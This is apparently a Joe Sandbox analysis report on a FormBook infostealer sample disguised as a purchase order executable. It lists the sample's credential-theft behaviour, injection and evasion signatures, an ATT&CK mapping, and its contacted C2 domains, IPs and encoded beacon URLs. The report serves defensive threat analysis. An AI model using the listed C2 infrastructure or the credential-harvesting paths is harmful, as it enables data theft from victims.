            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: WIN_81
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: WIN_XP
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: WIN_XPe
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: WIN_VISTA
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: WIN_7
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00AE91DC
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00AE96E2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510012 Sample: Purchase Order TE- 00011-7777.exe Startdate: 12/09/2024 Architecture: WINDOWS Score: 100 28 www.kckartal.xyz 2->28 30 www.golbasi-nakliyat.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 6 other signatures 2->50 10 Purchase Order TE- 00011-7777.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 CjeBlighAyoJst.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RMActivate_ssp.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 CjeBlighAyoJst.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.quilo.life 203.161.43.228, 49730, 49731, 49732 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 mfgamecompany.shop 185.173.111.76, 49726, 49727, 49728 TERRATRANSIT-ASDE Germany 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Purchase Order TE- 00011-7777.exe29%ReversingLabs
            Purchase Order TE- 00011-7777.exe30%VirustotalBrowse
            Purchase Order TE- 00011-7777.exe100%AviraHEUR/AGEN.1321695
            Purchase Order TE- 00011-7777.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            hm62t.top2%VirustotalBrowse
            bola88site.one0%VirustotalBrowse
            www.726075.buzz1%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.hm62t.top2%VirustotalBrowse
            www.qiluqiyuan.buzz1%VirustotalBrowse
            freepicture.online1%VirustotalBrowse
            www.mfgamecompany.shop0%VirustotalBrowse
            www.bola88site.one0%VirustotalBrowse
            www.monos.shop0%VirustotalBrowse
            www.golbasi-nakliyat.xyz2%VirustotalBrowse
            www.freepicture.online1%VirustotalBrowse
            www.318st.com0%VirustotalBrowse
            www.kxshopmr.store0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.mizuquan.top0%Avira URL Cloudsafe
            http://www.mizuquan.top/ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp0%Avira URL Cloudsafe
            http://www.bola88site.one/3lkx/0%Avira URL Cloudsafe
            http://www.hm62t.top/p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp0%Avira URL Cloudsafe
            http://www.freepicture.online/xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/0%Avira URL Cloudsafe
            https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/k2vl/0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/1%VirustotalBrowse
            http://www.kckartal.xyz/h5qr/0%Avira URL Cloudsafe
            http://www.quilo.life/ftr3/0%Avira URL Cloudsafe
            http://www.kckartal.xyz/h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp0%Avira URL Cloudsafe
            http://www.hm62t.top/p39s/0%Avira URL Cloudsafe
            http://www.mizuquan.top/ed2j/0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/k2vl/2%VirustotalBrowse
            http://www.quilo.life/ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp0%Avira URL Cloudsafe
            http://www.freepicture.online/xcfw/0%Avira URL Cloudsafe
            http://www.hm62t.top/p39s/1%VirustotalBrowse
            http://www.qiluqiyuan.buzz/wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp0%Avira URL Cloudsafe
            http://www.qiluqiyuan.buzz/wjff/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.freepicture.online/xcfw/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            hm62t.top
            		154.23.184.240
            		truetrueunknown
            www.kckartal.xyz
            		104.21.20.125
            		truetrue
              		unknown
              www.quilo.life
              		203.161.43.228
              		truetrue
                		unknown
                bola88site.one
                		172.96.191.39
                		truetrueunknown
                www.mizuquan.top
                		43.242.202.169
                		truetrue
                  		unknown
                  freepicture.online
                  		89.58.49.1
                  		truetrueunknown
                  mfgamecompany.shop
                  		185.173.111.76
                  		truetrue
                    		unknown
                    www.726075.buzz
                    		47.57.185.227
                    		truetrueunknown
                    www.qiluqiyuan.buzz
                    		161.97.168.245
                    		truetrueunknown
                    natroredirect.natrocdn.com
                    		85.159.66.93
                    		truetrueunknown
                    www.golbasi-nakliyat.xyz
                    		unknown
                    		unknowntrueunknown
                    www.freepicture.online
                    		unknown
                    		unknowntrueunknown
                    www.monos.shop
                    		unknown
                    		unknowntrueunknown
                    www.hm62t.top
                    		unknown
                    		unknowntrueunknown
                    www.mfgamecompany.shop
                    		unknown
                    		unknowntrueunknown
                    www.bola88site.one
                    		unknown
                    		unknowntrueunknown
                    www.318st.com
                    		unknown
                    		unknowntrueunknown
                    www.kxshopmr.store
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.hm62t.top/p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.bola88site.one/3lkx/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mizuquan.top/ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.freepicture.online/xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mfgamecompany.shop/lwt6/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.golbasi-nakliyat.xyz/k2vl/true
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kckartal.xyz/h5qr/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kckartal.xyz/h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.quilo.life/ftr3/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hm62t.top/p39s/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mizuquan.top/ed2j/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.quilo.life/ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.freepicture.online/xcfw/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.qiluqiyuan.buzz/wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.golbasi-nakliyat.xyz/k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.qiluqiyuan.buzz/wjff/true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabRMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mizuquan.topCjeBlighAyoJst.exe, 00000006.00000002.3889597488.0000000004BD7000.00000040.80000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZRMActivate_ssp.exe, 00000004.00000002.3888738930.0000000004040000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003490000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssRMActivate_ssp.exe, 00000004.00000002.3888738930.00000000041D2000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003622000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    203.161.43.228
                    		www.quilo.lifeMalaysia
                    		45899VNPT-AS-VNVNPTCorpVNtrue
                    172.96.191.39
                    		bola88site.oneCanada
                    		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                    104.21.20.125
                    		www.kckartal.xyzUnited States
                    		13335CLOUDFLARENETUStrue
                    47.57.185.227
                    		www.726075.buzzUnited States
                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                    89.58.49.1
                    		freepicture.onlineGermany
                    		5430FREENETDEfreenetDatenkommunikationsGmbHDEtrue
                    154.23.184.240
                    		hm62t.topUnited States
                    		174COGENT-174UStrue
                    85.159.66.93
                    		natroredirect.natrocdn.comTurkey
                    		34619CIZGITRtrue
                    185.173.111.76
                    		mfgamecompany.shopGermany
                    		42366TERRATRANSIT-ASDEtrue
                    43.242.202.169
                    		www.mizuquan.topHong Kong
                    		40065CNSERVERSUStrue
                    161.97.168.245
                    		www.qiluqiyuan.buzzUnited States
                    		51167CONTABODEtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1510012
                    Start date and time:2024-09-12 13:01:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 45s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Purchase Order TE- 00011-7777.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/3@13/10
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 92%
                    • Number of executed functions: 51
                    • Number of non-executed functions: 289
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:02:56API Interceptor7130797x Sleep call for process: RMActivate_ssp.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    203.161.43.228Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • www.quilo.life/ftr3/
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • www.quilo.life/ftr3/
                    Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                    • www.virox.top/basq/
                    Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                    • www.quilo.life/ftr3/
                    PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                    • www.quilo.life/ftr3/
                    6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                    • www.virox.top/basq/
                    DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                    • www.lyxor.top/top4/
                    PO 18-3081.exeGet hashmaliciousFormBookBrowse
                    • www.velix.buzz/0qme/
                    GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                    • www.fynra.xyz/i65r/
                    AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                    • www.quilo.life/ftr3/
                    172.96.191.39Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/3lkx/
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/3lkx/
                    Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/3lkx/
                    PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/3lkx/
                    doc330391202408011.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/wqrm/
                    PO #86637.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/3qit/
                    REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/wqrm/
                    REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/wqrm/
                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                    • www.bola88site.one/3qit/
                    IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.bola88site.one/frol/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    www.kckartal.xyzPayment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • 104.21.20.125
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • 104.21.20.125
                    Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                    • 172.67.192.227
                    PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                    • 172.67.192.227
                    AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                    • 104.21.20.125
                    PO#4510065525.exeGet hashmaliciousFormBookBrowse
                    • 104.21.20.125
                    www.quilo.lifePayment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    PO#4510065525.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    VNPT-AS-VNVNPTCorpVNPayment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                    • 203.161.42.73
                    PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    MV ALIADO-S-REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                    • 203.161.42.73
                    Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                    • 203.161.43.228
                    doc330391202408011.exeGet hashmaliciousFormBookBrowse
                    • 203.161.42.73
                    yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                    • 203.161.42.73
                    1V8XAuKZqe.exeGet hashmaliciousFormBookBrowse
                    • 203.161.42.161
                    CLOUDFLARENETUSPurchase order.exeGet hashmaliciousFormBookBrowse
                    • 188.114.96.3
                    http://sparksphere.ru/RMSzvGet hashmaliciousHTMLPhisherBrowse
                    • 172.67.147.72
                    https://www.jtsmedicalcentre.com/adobereader/adobe.php?email=cemfa_gab_sec@emfa.ptGet hashmaliciousUnknownBrowse
                    • 104.26.1.147
                    https://smarthdd.com/smarthdd-setup.exeGet hashmaliciousUnknownBrowse
                    • 104.16.79.73
                    SecuriteInfo.com.Trojan.PWS.Siggen3.38160.4541.30793.exeGet hashmaliciousUnknownBrowse
                    • 104.16.184.241
                    https://purdue0-my.sharepoint.com/:b:/g/personal/smharrel_purdue_edu/EfkZDXWGfClCplaGiKthQoUBK8GXZs5ymE-vf6tacU7vPA?e=VQBHbeGet hashmaliciousHtmlDropperBrowse
                    • 188.114.96.3
                    Rechnung_2024-09-03_100148163067_V21648588.htmlGet hashmaliciousUnknownBrowse
                    • 104.18.11.207
